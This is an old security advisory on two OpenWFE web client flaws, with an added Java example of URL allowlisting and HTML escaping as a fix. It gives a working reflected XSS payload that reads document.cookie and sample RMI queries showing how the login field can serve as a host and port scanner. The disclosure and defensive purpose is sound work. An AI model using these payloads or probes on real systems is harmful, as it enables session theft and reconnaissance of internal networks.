Two Vulnerabilities in OpenWFE Web Client
---------------------------------------------------------------------------
Author: Jose Antonio Coret (Joxean Koret)
Date: 2004
Location: Basque Country
---------------------------------------------------------------------------
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
OpenWFE - Open WorkFlow Engine v1.4.x
OpenWFE is an open source Java workflow engine. It is a complete Business Process Management suite with 4 components: an engine, a worklist, a web client and a reactor (a host for automatic agents). It can also be used behind the scenes.
Web: http://www.openwfe.org
---------------------------------------------------------------------------
Vulnerabilities:
~~~~~~~~~~~~~~~~
A. Cross Site Scripting Vulnerability in the 'Login Form' of the Web Client.

A1. The login form of the Web Client has 3 fields:
1.- The URL of the RMI Remote Service
2.- The username
3.- The password

The URL field is vulnerable to an XSS attack because its value is not validated at all before being reflected back into the page.

To test the problem follow these steps:
1.- Go to any site that has the OpenWFE web client.
2.- In the Worklist URL field insert, for example, the following data:
rmi://localhost:7080/workSessionServer"><script>alert(document.cookie)</script>
or this:
rmi://<h1>hi</h1>:7099/workSessionServer
3.- Enter any username and password, and press the button to login.
B. Possible Port Scanner

B1. The Worklist URL field has the form:
rmi://<hostname>:<port>/location
Because of the nature of the Worklist URL parameter (the web client opens a connection to whatever host and port the user supplies), it is possible to build a simple port/host scanner from the perspective of the OpenWFE host.

Example:
Query -> rmi://server/workSessionServer
Response Time -> 1 second
Response -> Error: java.rmi.UnknownHostException: Unknown host

Query -> rmi://localhost:709/workSessionServer
Response Time -> 1 second
Response -> Error: java.rmi.ConnectException: Connection refused to host

Query -> rmi://localhost:7085/workSessionServer
Response Time -> 5 seconds
Response -> Error: java.rmi.ConnectIOException: error during JRMP connection establishment

Query -> rmi://drill.hackerslab.org:23/workSessionServer
Response Time -> Greater than 5 seconds
Response -> Error: java.rmi.ConnectIOException: non-JRMP server at remote endpoint

Query -> rmi://192.168.1.2/workSessionServer
Response Time -> Greater than 30 seconds
Response -> No response, no timeout

Since both the response time and the error message differ for each case, it is quite easy to build a simple port/host scanner on top of this field.
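As an added example (not code from this advisory or from OpenWFE), the kind of server-side check that closes both issues: the Worklist URL must parse as rmi://host:port/path, the host and port must be on an allowlist (assumed values below), and whatever is echoed back to the user is HTML-escaped first. The class and allowlist names are hypothetical.

```java
import java.net.URI;
import java.net.URISyntaxException;
import java.util.Set;

// Hypothetical server-side check for the Worklist URL field (added example, not OpenWFE code).
public final class WorklistUrlCheck {
    // Assumed allowlist: the only worklist hosts and port this web client may contact.
    static final Set<String> ALLOWED_HOSTS = Set.of("localhost", "worklist.example.internal");
    static final int ALLOWED_PORT = 7080;

    // Returns the normalised URL, or throws so the caller never dials an arbitrary host/port.
    static String validate(String raw) {
        URI uri;
        try {
            uri = new URI(raw); // '"', '<', '>' and whitespace are rejected here already
        } catch (URISyntaxException e) {
            throw new IllegalArgumentException("malformed worklist URL");
        }
        if (!"rmi".equals(uri.getScheme()) || uri.getHost() == null || uri.getUserInfo() != null
                || uri.getQuery() != null || uri.getFragment() != null) {
            throw new IllegalArgumentException("only rmi://host:port/path is accepted");
        }
        if (!ALLOWED_HOSTS.contains(uri.getHost().toLowerCase()) || uri.getPort() != ALLOWED_PORT) {
            throw new IllegalArgumentException("host or port not in allowlist");
        }
        return uri.toString();
    }

    // Escape before echoing the value back into HTML, whether or not validation passed.
    static String htmlEscape(String s) {
        return s.replace("&", "&amp;").replace("<", "&lt;").replace(">", "&gt;")
                .replace("\"", "&quot;").replace("'", "&#39;");
    }

    public static void main(String[] args) {
        String[] probes = { "rmi://localhost:7080/workSessionServer",
            "rmi://localhost:7080/workSessionServer\"><script>alert(document.cookie)</script>",
            "rmi://192.168.1.2/workSessionServer" };
        for (String p : probes) {
            try {
                System.out.println("accepted: " + validate(p));
            } catch (IllegalArgumentException e) {
                System.out.println("rejected (" + e.getMessage() + "): " + htmlEscape(p));
            }
        }
    }
}
```

Rejecting the request before any RMI lookup is what removes the timing and error-message differences used for scanning; the escape covers the login page that redisplays the submitted value.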
The fix:
~~~~~~~~
The problems have been fixed in the latest release of the OpenWFE web client. Go to http://www.openwfe.org for more information about the patch.
Disclaimer:
~~~~~~~~~~~
The information in this advisory and any of its demonstrations is provided "as is" without any warranty of any kind. I am not liable for any direct or indirect damages caused as a result of using the information or demonstrations provided in any part of this advisory.
---------------------------------------------------------------------------
Contact:
~~~~~~~~
Joxean Koret at
joxeanpiti<<<<<<<<@>>>>>>>>yah00<<<<<<dot>>>>>es